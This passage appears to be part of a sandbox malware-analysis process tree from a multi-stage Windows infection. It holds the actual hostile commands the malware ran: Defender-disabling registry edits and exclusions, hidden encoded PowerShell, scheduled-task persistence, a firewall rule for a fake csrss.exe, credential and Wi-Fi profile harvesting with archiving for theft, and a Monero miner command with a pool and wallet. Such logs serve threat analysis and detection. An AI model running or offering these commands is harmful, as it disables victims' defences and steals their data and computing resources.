        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:3536
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:3160
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:2068
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2424
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:2068
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:3160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3852
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\etXsBBs.exe\" it /tSididyayo 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:3360
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:2492
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:3208
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:280
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        
        PID:2040
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        Executes dropped EXE
        
        PID:3112
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 116
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:3144
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:3304
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:3328
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:3372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\627615824406_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3508
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:3656
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        Loads dropped DLL
        
        PID:4020
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:3604
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        Executes dropped EXE
        
        PID:3664
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:3704
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        Executes dropped EXE
        
        PID:3124
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:1848
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        Executes dropped EXE
        
        PID:3728
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:3640
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        Executes dropped EXE
        
        PID:4036
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:3588
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        Executes dropped EXE
        
        PID:2244
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:1740
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        Executes dropped EXE
        
        PID:1552
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:3872
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:1740
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        Executes dropped EXE
        
        PID:3828
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        Executes dropped EXE
        
        PID:3824
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        Executes dropped EXE
        
        PID:3756
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:3120
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3952
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:4036
      - C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe"
        6⤵
        Executes dropped EXE
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\u2mk.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2mk.0.exe"
        7⤵
        Executes dropped EXE
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\u2mk.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2mk.1.exe"
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        
        PID:3444
      - C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe"
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3840
      - C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
        7⤵
        Executes dropped EXE
        
        PID:3344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        8⤵
        
        PID:3680
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        9⤵
        Modifies Windows Firewall
        
        PID:4036
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:3712
- - C:\Users\Admin\AppData\Local\Temp\1000020001\a3ad3d4d5f.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\a3ad3d4d5f.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:644
- - C:\Users\Admin\1000021002\b0dcc639cc.exe
    "C:\Users\Admin\1000021002\b0dcc639cc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2280
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2020
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6d29758,0x7fef6d29768,0x7fef6d29778
        5⤵
        
        PID:1732
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1108 --field-trial-handle=1148,i,5700063874089179098,7832891992424518897,131072 /prefetch:2
        5⤵
        
        PID:2348
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1148,i,5700063874089179098,7832891992424518897,131072 /prefetch:8
        5⤵
        
        PID:1992
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1556 --field-trial-handle=1148,i,5700063874089179098,7832891992424518897,131072 /prefetch:8
        5⤵
        
        PID:2532
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2248 --field-trial-handle=1148,i,5700063874089179098,7832891992424518897,131072 /prefetch:1
        5⤵
        
        PID:1448
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1148,i,5700063874089179098,7832891992424518897,131072 /prefetch:1
        5⤵
        
        PID:2000
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1412 --field-trial-handle=1148,i,5700063874089179098,7832891992424518897,131072 /prefetch:2
        5⤵
        
        PID:1936
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3348 --field-trial-handle=1148,i,5700063874089179098,7832891992424518897,131072 /prefetch:1
        5⤵
        
        PID:2796
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3616 --field-trial-handle=1148,i,5700063874089179098,7832891992424518897,131072 /prefetch:8
        5⤵
        
        PID:2476

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2536

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "27264876013288880731516982557444442130-1702421527-1684484821-1628881591-207908487"
1⤵
PID:2600

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240507094634.log C:\Windows\Logs\CBS\CbsPersist_20240507094634.cab
1⤵
PID:3204

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3532
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3736
- - C:\Windows\Temp\864058.exe
    "C:\Windows\Temp\864058.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3440

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:1988
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:3740

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:3240
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:3560
- - C:\Windows\Temp\106364.exe
    "C:\Windows\Temp\106364.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:3132

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1555263740546716882-96905872-180552084-1323725942-545956321-13636483031241632096"
1⤵
PID:2448

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\D3D3.bat" "
1⤵
PID:3180
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
  2⤵
  PID:3324

C:\Windows\system32\taskeng.exe
taskeng.exe {B49BBB7D-EAEF-4EE9-903F-70DBD2BA8BFA} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
1⤵
PID:3252
- C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  2⤵
  PID:3596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1428
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2304
- C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
  2⤵
  PID:3960

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\F2B9.bat" "
1⤵
PID:3268
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
  2⤵
  PID:1040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12482748001688454500-655249389176409669272239042-14527618731594856667-211983935"
1⤵
PID:3444

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1772522170-15678734063599464851119437155336659082328550785755140871-245113406"
1⤵
PID:3328

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "264128122-1975583037-1349170392-35121392-1729028849-1665721673440561163-583846085"
1⤵
PID:1944

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1149293207-508106428224050868-1657430700-1280982176-1028868010-21355108361139807903"
1⤵
PID:1848

C:\Windows\system32\taskeng.exe
taskeng.exe {561B9F73-BC09-44A9-BAE8-251F5AE09AB5} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3320
- C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\etXsBBs.exe
  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\etXsBBs.exe it /tSididyayo 385118 /S
  2⤵
  PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2092
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:3584
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1660
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:1600
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:1348
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2916
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:2728
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:1556
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2796
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:3152
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:972
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:1728
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:2804
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:1628
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:3244
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:688
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:2592
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ggAgEXmsd" /SC once /ST 05:03:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ggAgEXmsd"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ggAgEXmsd"
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
    3⤵
    PID:3484
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
      4⤵
      PID:3404
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3760
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        6⤵
        
        PID:1216
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3692
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2076
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:352
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2872
- - C:\Windows\SysWOW64\cmd.exe
